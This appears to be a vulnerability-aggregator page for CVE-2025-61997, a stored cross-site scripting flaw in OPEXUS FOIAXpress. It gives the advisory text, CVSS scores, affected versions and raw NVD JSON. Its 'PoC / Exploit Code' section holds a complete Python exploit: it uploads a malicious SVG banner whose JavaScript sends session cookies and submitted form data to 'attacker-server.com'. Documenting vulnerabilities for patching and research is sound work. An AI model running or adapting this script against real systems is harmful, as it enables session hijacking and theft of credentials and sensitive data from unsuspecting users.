Security Vulnerability Report
CVE-2025-61997 CVSS 4.3 MEDIUM

CVE-2025-61997

Published: 2025-10-08 00:15:34
Last Modified: 2025-10-22 14:45:25
Source: 9119a7d8-5eab-497f-8521-727c672e3725

Description

OPEXUS FOIAXpress before 11.13.3.0 allows an administrative user to inject JavaScript or other content within the Annual Report Enterprise Banner image upload field. Injected content is executed in the context of other users when they generate an Annual Report. Successful exploitation allows the administrative user to perform actions on behalf of the target, including stealing session cookies, user credentials, or sensitive data.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:opexustech:foiaxpress:*:*:*:*:*:*:*:* - VULNERABLE
OPEXUS FOIAXpress < 11.13.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is provided for security research and authorized testing only; run it solely against systems you are explicitly permitted to test.
# CVE-2025-61997 - OPEXUS FOIAXpress Stored XSS PoC # Vulnerability: Stored XSS via Annual Report Enterprise Banner image upload import requests TARGET_URL = "https://target-foiaxpress-server.com" ADMIN_SESSION = "admin_session_cookie_here" # Step 1: Login as administrator (requires valid admin credentials) def login_as_admin(session, username, password): """Authenticate to FOIAXpress as an administrator user""" login_url = f"{TARGET_URL}/login" credentials = { "username": username, "password": password } response = session.post(login_url, data=credentials) return response.status_code == 200 # Step 2: Create a malicious payload disguised as an image file def create_malicious_banner(): """Create a malicious SVG file containing XSS payload""" # SVG format supports embedded JavaScript, which can bypass # simple file extension validation malicious_svg = """<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 200 200"> <script type="text/javascript"> // XSS Payload: Steal session cookies and credentials var sessionData = document.cookie; var exfilUrl = "https://attacker-server.com/collect?data=" + encodeURIComponent(sessionData); // Create an image request to exfiltrate data new Image().src = exfilUrl; // Additional payload: steal form data document.querySelectorAll('form').forEach(function(form) { form.addEventListener('submit', function(e) { var formData = new FormData(form); var params = new URLSearchParams(formData).toString(); new Image().src = "https://attacker-server.com/collect?form=" + encodeURIComponent(params); }); }); </script> <rect x="0" y="0" width="200" height="200" fill="blue"/> <text x="50" y="100" fill="white">Enterprise Banner</text> </svg>""" return malicious_svg # Step 3: Upload the malicious file as Enterprise Banner def upload_malicious_banner(session): """Upload the malicious banner to the Annual Report configuration""" upload_url = 
f"{TARGET_URL}/annual-report/enterprise-banner-upload" malicious_content = create_malicious_banner() files = { "banner_image": ("banner.svg", malicious_content, "image/svg+xml") } response = session.post(upload_url, files=files) if response.status_code == 200: print("[+] Malicious banner uploaded successfully") print("[+] Payload will execute when any user generates an Annual Report") return response.status_code == 200 # Step 4: Trigger execution (when a victim generates an Annual Report) # The malicious script will execute in the victim's browser context if __name__ == "__main__": session = requests.Session() session.headers.update({"Cookie": f"session={ADMIN_SESSION}"}) # Upload malicious banner if upload_malicious_banner(session): print("[+] Exploit deployed. Waiting for victim to trigger...") print("[+] When any user generates an Annual Report,") print("[+] the malicious JavaScript will execute in their browser context.")

References

Raw JSON Data

{"cve": {"id": "CVE-2025-61997", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-08T00:15:34.070", "lastModified": "2025-10-22T14:45:25.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPEXUS FOIAXpress before 11.13.3.0 allows an administrative user to inject JavaScript or other content within the Annual Report Enterprise Banner image upload field. Injected content is executed in the context of other users when they generate an Annual Report. Successful exploitation allows the administrative user to perform actions on behalf of the target, including stealing session cookies, user credentials, or sensitive data."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opexustech:foiaxpress:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.13.3.0", "matchCriteriaId": "7077A02D-D6F5-4E4E-B6A4-E2D8AFBF8EAC"}]}]}], "references": [{"url": "https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Release Notes"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-280-01.json", "source": 
"9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-61997", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}